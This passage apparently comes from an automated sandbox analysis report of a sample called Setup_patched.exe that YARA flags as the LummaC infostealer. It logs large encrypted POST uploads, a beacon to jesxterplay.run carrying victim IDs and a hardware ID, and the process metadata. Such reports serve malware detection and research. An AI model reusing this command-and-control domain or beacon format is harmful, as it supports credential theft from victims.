                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: bd 7b 99 f3 d1 be 3e 99 72 1b cb 46 cd 78 85 d3 4a 9a d1 18 99 27 48 ae 4d be 05 d4 79 77 1d 15 2c 63 6d 43 18 2b a9 af 9a 1f 0a 37 99 39 37 60 df ae 27 f4 10 54 ab ec e9 1b aa 83 53 08 62 89 04 e7 a4 81 cb 25 fd 6f 45 c9 7a d9 77 b2 03 cf 90 80 4e bb 8a c7 27 13 41 47 a3 51 05 bc bb 35 5d ad 6b 49 3e 95 68 5b f8 1a 1b 75 63 4b 45 25 37 97 b8 58 1d b6 7b b1 f8 4c c2 4f 9c 0e 05 84 e6 02 21 2c a3 82 57 b6 50 f2 55 1c 26 33 cf 35 13 a2 d2 8a a2 3d a9 34 e5 0d 47 d7 fd 0e 08 85 6a 1a 52 d0 ad 6c 8e ab 22 7d 21 77 b9 56 dc 61 fd de 41 b5 6c e2 61 ae df 76 90 ef 5a 3c 22 fb 3d a6 16 56 50 68 e9 68 ae 49 e9 b4 0f 31 3e 52 c9 64 a8 af fb b4 76 77 f9 4d 6f e7 e1 0c 94 d3 e8 db 2c e6 cf 56 25 91 be 40 b1 9f 92 52 ab f3 3d 1c 68 94 a3 e6 da a0 26 19 c3 5e 95 21 b5
                                                                                Data Ascii: {>rFxJ'HMyw,cmC+797`'TSb%oEzwN'AGQ5]kI>h[ucKE%7X{LO!,WPU&35=4GjRl"}!wVaAlavZ<"=VPhhI1>RdvwMo,V%@R=h&^!
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: 4f 47 3d 6d b5 1e cb 63 bf 4c 5f 26 ba d7 8c b0 dc d5 fa 04 04 1b 44 fd c2 19 e2 e1 3b 27 3e f2 70 24 0b e5 1f f5 2b 06 59 61 2d fe 0e 85 0a 9c f2 c7 74 b1 8c be 39 1f ac 81 f2 a7 e7 3f e7 05 e0 6c cb ff 9d 30 b0 46 b9 f4 29 88 41 d4 99 f4 66 4f 8f a9 c3 d5 b6 d0 85 ab fa ca aa 36 8b 4f 50 60 a0 24 52 f1 ea 8a 56 79 f6 1c f8 07 65 8e fd 68 b6 3c ce 1b 72 e3 21 42 21 28 9d b2 bf b3 15 70 66 8a 04 20 0f d1 48 92 37 ab a8 aa 64 db 06 01 72 6b d0 87 70 db 0b c5 43 6c e8 37 06 c8 d9 69 75 a0 fa 2e 91 95 93 55 7a 8f 95 99 02 9c c5 d9 2e 2a 51 22 9c 3f b2 f5 45 21 f0 cb e0 1e 93 10 80 a8 20 8a d0 02 b0 8e d2 9c 21 b8 50 06 f4 8a 22 06 98 9f 07 9a 33 0c 12 d5 14 e0 fd 1e 78 73 71 bf 8f ea 22 66 30 6e 17 f8 72 c4 17 56 cb b5 ed 57 e0 55 f2 c2 91 14 24 45 f4 49 67
                                                                                Data Ascii: OG=mcL_&D;'>p$+Ya-t9?l0F)AfO6OP`$RVyeh<r!B!(pf H7drkpCl7iu.Uz.*Q"?E! !P"3xsq"f0nrVWU$EIg
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: ff 2b 0c cb 6f 0a e1 21 9b c7 9f 5e 2c 81 37 38 82 fc d5 9a 84 5e a5 79 40 b4 3b 48 21 ad bf 8e da 32 9b 67 28 08 78 d1 c1 4d 81 41 ec 56 0c 45 9c 88 d2 e9 8e 52 86 ed ff 41 88 09 59 f6 07 51 74 ac d6 0f 60 4f ad 9b 11 cd d2 a3 62 4b 29 65 4e e6 cd 9e 24 c5 be 59 35 36 4d 1e b8 39 6a 0b 01 5e 3f be 25 30 53 70 1e 44 be 64 90 d2 ed 57 28 6d f9 1d 69 3c 68 eb a4 46 0d 96 fc e2 f3 2e 73 e4 6e d2 70 96 a3 cf 8a 44 31 2b 14 37 4b c4 b7 e4 49 22 8e b9 3e 23 f0 57 de cc 9b 00 1b d7 b4 88 62 32 9a 1d a5 95 5c cc 48 76 7a 32 c3 9c da 3b 42 84 5a b5 63 91 54 4f c3 ff 10 17 66 4c 41 fb ca 60 c7 18 03 f9 9e 6c 5e da ca f8 49 89 5b 9b 4e f8 1d 39 20 b0 88 58 b4 ee ed f5 71 5b 05 29 b8 05 81 2b 95 f8 71 9e 54 5b c5 c0 91 57 fc 24 2f 46 c3 cf 19 b5 63 83 a0 83 d6 b1 38
                                                                                Data Ascii: +o!^,78^y@;H!2g(xMAVERAYQt`ObK)eN$Y56M9j^?%0SpDdW(mi<hF.snpD1+7KI">#Wb2\Hvz2;BZcTOfLA`l^I[N9 Xq[)+qT[W$/Fc8
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: c5 92 9e 1c bd dc b8 7f 4b ae df 59 e3 69 aa d0 e5 32 30 01 13 91 7e 5b 41 53 ca 38 e5 56 aa 33 c6 27 ec d8 53 b0 b5 4e ab fa c7 23 91 38 84 2d 83 6f 0d 88 0f a2 4a 21 8a e1 e8 8d 3f e0 63 3c 2e af af c8 c3 28 1f 8d 25 89 b0 cd 64 54 aa 45 0b 7a 7d 5f 2d ed 85 fa 47 6b 65 02 da fa ac 9a 89 17 08 ea f0 4d 5d 50 a8 97 33 60 a5 8b bd 47 ec 0e e8 38 86 98 c6 82 b6 85 d2 1a 19 72 93 70 26 ff 52 e7 8c ea 7d 10 b5 c8 b0 8a ec 6b a4 9a a3 c0 4a ba 52 28 c7 e4 40 39 3f 47 5d 1b 02 35 03 7c b6 25 4d 84 9c 4d 96 06 d2 11 06 7b b9 0c e0 af a2 c7 5b 0a 8f e2 66 fa 5b 77 8d 36 80 5f b0 85 1b cb aa 69 9f fd 3f da 1c c7 e5 87 57 21 c0 4f 8a 0d 51 68 d3 f1 f6 80 88 ad 70 20 11 fb 5e 49 03 79 3f bd e7 a3 f6 17 c1 09 0d 4c 10 89 b4 28 6d dd 64 fa 06 3d 53 d9 67 f9 7a 9d 1c
                                                                                Data Ascii: KYi20~[AS8V3'SN#8-oJ!?c<.(%dTEz}_-GkeM]P3`G8rp&R}kJR(@9?G]5|%MM{[f[w6_i?W!OQhp ^Iy?L(md=Sgz
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: 5e de 04 61 1c 9e dc b2 aa ac b1 21 7b 3d de 15 c6 58 4a d5 80 89 0e 95 00 10 4e 04 3c ca 8b 1b 07 ec ef 73 e5 e0 ef 78 a5 28 5d 34 b8 8a 21 02 ad 07 cd a0 c0 01 69 fe 8b 9c 87 3d 83 94 b7 98 76 18 c2 8f 1a 6e 1d ee 80 22 b6 ce 3d af 16 01 5a 59 82 9f ec dc 31 d0 52 3d 80 8c 1f c3 f6 03 c0 78 ae 6f e4 cf 9d 95 86 0b b3 e3 f0 7b 7b 4f 14 b3 92 dd a1 28 7c c5 c8 35 a8 3b c2 96 2a 10 44 08 7e 82 c3 28 0a 19 5d de 9a b0 3a b1 93 44 57 56 9c d7 50 92 f4 ff bd 3d 74 17 b6 ac 28 5b b0 87 8a fb 47 4a a0 50 03 37 f5 51 12 16 a9 14 07 d3 7e 3a 1a 84 35 fb 20 7d 0f 26 35 7d a0 7c 03 29 74 5f d4 ed 23 e0 c5 b6 19 a6 13 c7 e9 08 bc f5 4e 92 2f 39 44 0a ca b2 e7 df f0 bc f3 6d da bb 62 13 62 a3 8e 5c 9d a0 d9 56 6d 9d 7b f6 2f 48 27 3a 0b 86 fd cb 55 ea bb 84 24 84 9d
                                                                                Data Ascii: ^a!{=XJN<sx(]4!i=vn"=ZY1R=xo{{O(|5;*D~(]:DWVP=t([GJP7Q~:5 }&5}|)t_#N/9Dmbb\Vm{/H':U$
                                                                                2025-04-13 15:05:33 UTC814INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:33 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9L0x1oUXfAQkml4dWTGdjHGycMmThAXJRZxFxVhBj4FSMlRC5Y9BzqPZCER6McMKwSkPavx4wTCq6k1t3mwK%2Fyp1oOoBJiG4p3vRo2bsCL8An%2BtEYWWAotuE8%2Bgg4OdJJ2w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdcb57bd3bcba-ATL
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=106241&min_rtt=105861&rtt_var=22902&sent=211&recv=448&lost=0&retrans=0&sent_bytes=3049&recv_bytes=591978&delivery_rate=37731&cwnd=252&unsent_bytes=0&cid=286cf5ef194bed5b&ts=1643&x=0"


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.549702104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:33 UTC266OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 119
                                                                                Host: jesxterplay.run
                                                                                2025-04-13 15:05:33 UTC119OUTData Raw: 75 69 64 3d 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 26 63 69 64 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 37 42 30 42 31 37 45 33 43 38 35 38 42 43 37 42 38 44 30 37 46 44 44 32 45 31 32 34 43 32 33 34
                                                                                Data Ascii: uid=c543fd9fe0022f49bec7c3fa2ca8ec77934d0306&cid=637b55279021aab33278188cfa638397&hwid=7B0B17E3C858BC7B8D07FDD2E124C234
                                                                                2025-04-13 15:05:34 UTC793INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:34 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 108
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qe97K2v3Ezqj%2B%2F%2FPURdretiPY2jyAbh3vxHqmo1B2PaV466rxlx2%2FkWf5Zo6WAmZ%2BBEbP3BjOTmvF2kwSMvnkMUEAIxoQ9AB0oitj2CrOUp2Ip%2F%2BYVEqD3J1VBA6MPGqVlU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdcc2694f60c7-JAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=114486&min_rtt=113255&rtt_var=25138&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3048&recv_bytes=1021&delivery_rate=35613&cwnd=252&unsent_bytes=0&cid=c46a6c7582e6ee70&ts=466&x=0"
                                                                                2025-04-13 15:05:34 UTC108INData Raw: 5c 94 da 7c 7d a4 0d 7b 3d ad 76 9a 6b 32 a9 dd 58 a9 22 cf 2a 64 99 48 f5 95 68 88 27 8d b9 66 9a da 21 eb 25 79 41 ee da 34 4e 0f d8 74 c0 cf 20 0c f4 4a ec 09 23 4d c1 f0 15 b9 e7 0f 26 c6 bd b1 10 bc d8 d3 77 d3 66 df ed dc 3f a3 25 4b 7f fc 7b 14 20 cd 14 17 db d1 df 3e a6 1a db f2 d0 06 a5 8c b9 51 c8 d9 29 73 b3 72
                                                                                Data Ascii: \|}{=vk2X"*dHh'f!%yA4Nt J#M&wf?%K{ >Q)sr


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Target ID:3
                                                                                Start time:11:04:59
                                                                                Start date:13/04/2025
                                                                                Path:C:\Users\user\Desktop\Setup_patched.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Setup_patched.exe"
                                                                                Imagebase:0x400000
                                                                                File size:1'475'072 bytes
                                                                                MD5 hash:B4E8BDDA146B28CB226F3B1A77DBC7EC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1586693990.0000000003656000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Reset < >